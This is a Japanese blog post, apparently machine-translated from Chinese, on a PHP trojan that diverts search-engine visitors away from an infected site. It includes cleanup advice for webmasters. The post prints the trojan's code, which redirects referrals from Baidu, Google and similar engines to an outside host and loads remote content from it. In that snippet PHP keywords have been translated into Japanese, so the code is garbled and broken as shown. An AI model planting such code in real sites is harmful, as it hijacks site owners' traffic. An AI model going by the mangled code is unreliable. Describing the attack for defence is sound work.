検索エンジンのトラフィックを迂回させる PHP トロイの木馬の導入と防止

普段はアクセス数が多くPVも高いWebサイトなのに、ある日突然PVが下がり始めたら、Webサイトのコンテンツに問題があるだけでなく、トロイの木馬に感染していないか検討する必要があります。実際、検索エンジンのトラフィックを迂回させるPHPトロイの木馬は以前からありました。簡単に言うと、アクセストラフィックが検索エンジンから来ている場合、相手方のWebサイトのファイルを自動的に取得し、ユーザーに自分のWebサイトが見られないようにするのです。

私のウェブサイトが最近このような攻撃を受けたため、このコードを共有して、このような攻撃に対して依然として警戒する必要があるウェブマスター、特に PHP プログラムを使用してウェブサイトを構築している方々に何らかのインスピレーションを与えたいと考えています。過去のデータによると、このようなトロイの木馬は珍しいものではありません。1年前、あるいは数年前にも存在していたようですが、現在その影響は以前ほど大きくないかもしれません。

以下は、検索エンジンのトラフィックを転送する攻撃コードです。

エラー報告(E_ERROR);

ヘッダー('content-Type: text/html; charset=gb2312');

$come_from="baidu.com#google.com.hk#soso.com#sogou.com#cache.baidu.com#google.cn";

$referer = Split("#",$come_from);

foreach($referer を $v として){

if(strstr($_SERVER['HTTP_REFERER'],$v))

{

ヘッダー("場所: ".'http://www.abc.com/3/nb.html?'.$_SERVER['SERVER_NAME']);

}

}

echo file_get_contents('http://www.abc.com//xx/dn2.php');

?>

コードは非常にシンプルです。アクセス元が検索エンジンの場合、以下に説明する PHP ファイルと HTML ファイルを配置するため、ユーザーが期待する結果が得られません。もちろん、サーバーごとに設定は異なり、そのようなファイルをアップロードしても実行が制限されるサーバーもありますが、問題があるので、それを解決するのが次のステップです。

以下では私の解決策について簡単に説明します。今後同様の状況に遭遇する他の人に役立つことを願っています。

最初のステップは、当然ながら、類似の PHP ファイルを削除することです。これらの PHP ファイルには固定の名前はありませんが、すべてルート ディレクトリにあるため、簡単に見つけることができます。見慣れないファイルを削除するだけです。削除した後は興奮しないでください。まず他のディレクトリに移動して、類似した見慣れないファイルを探してください。見つかった見慣れないファイルを開いて、問題がある場合は直接削除してください。

2 番目のステップは、よく使用されるシステム PHP ファイルを引き続き調べて、これらのファイルが最近変更されたかどうかを確認することです。変更されている場合は、それらをダウンロードし、最初に表示された dv.php など、以前に表示された奇妙な PHP ファイル名を探します。これで、dv.php を検索して、このように変更されたかどうかを確認できます。また、他のディレクトリには通常、実際のトロイの木馬があります。

3番目のステップでは、360ウェブサイトセキュリティテストプラットフォームにアクセスできます。アップロードされたファイルが検証されたら、ウェブサイトが安全かどうかのテストを開始できます。一般的に、ウェブサイトが黒いリンクにリンクされている場合、または目に見えないテキストがある場合は、プロンプトが表示されるため、比較的簡単に使用できます。この機能は、ブラックリンクの検出に特に適しています。ブラックリンクは一般に隠されており、ウェブマスターが考え出すのが難しいためです。

4 番目のステップは、FTP アカウントのパスワード、Web サイトのバックエンド アドレス、Web サイトのバックエンド ログイン名、またはその他のパスワードなど、弱いパスワードを変更することです。7 文字または 8 文字のみなど、パスワードが弱すぎると思われる場合は、より難しいパスワードに変更することをお勧めします。弱いパスワードがスキャンされたために、多くの Web サイトがクラックされています。パスワードの長さを増やすことは、そのような Web サイトのクラックを防ぐのに役立ちます。

ここまで書いて、話は基本的に終わりです。ウェブサイトのセキュリティは緊急です。ウェブサイトのセキュリティ問題には常に注意を払う必要があります。注意を払わないと、ブラックリンクを張っている人たちがあなたを狙うでしょう。ウェブサイトのセキュリティを常に向上させることによってのみ、ハッキングを回避することができます。この記事は、Aibue.com (http://www.aibue.com) のウェブマスターによって作成されたものです。転載または共有する場合は、出典を明記してください。ご協力ありがとうございます。

原題: 検索エンジンのトラフィックを迂回させる PHP トロイの木馬の紹介と防止

キーワード: 検索エンジン、php トロイの木馬、dedecms、phpcm、ウェブマスター、ウェブサイト、ウェブサイトのプロモーション、収益化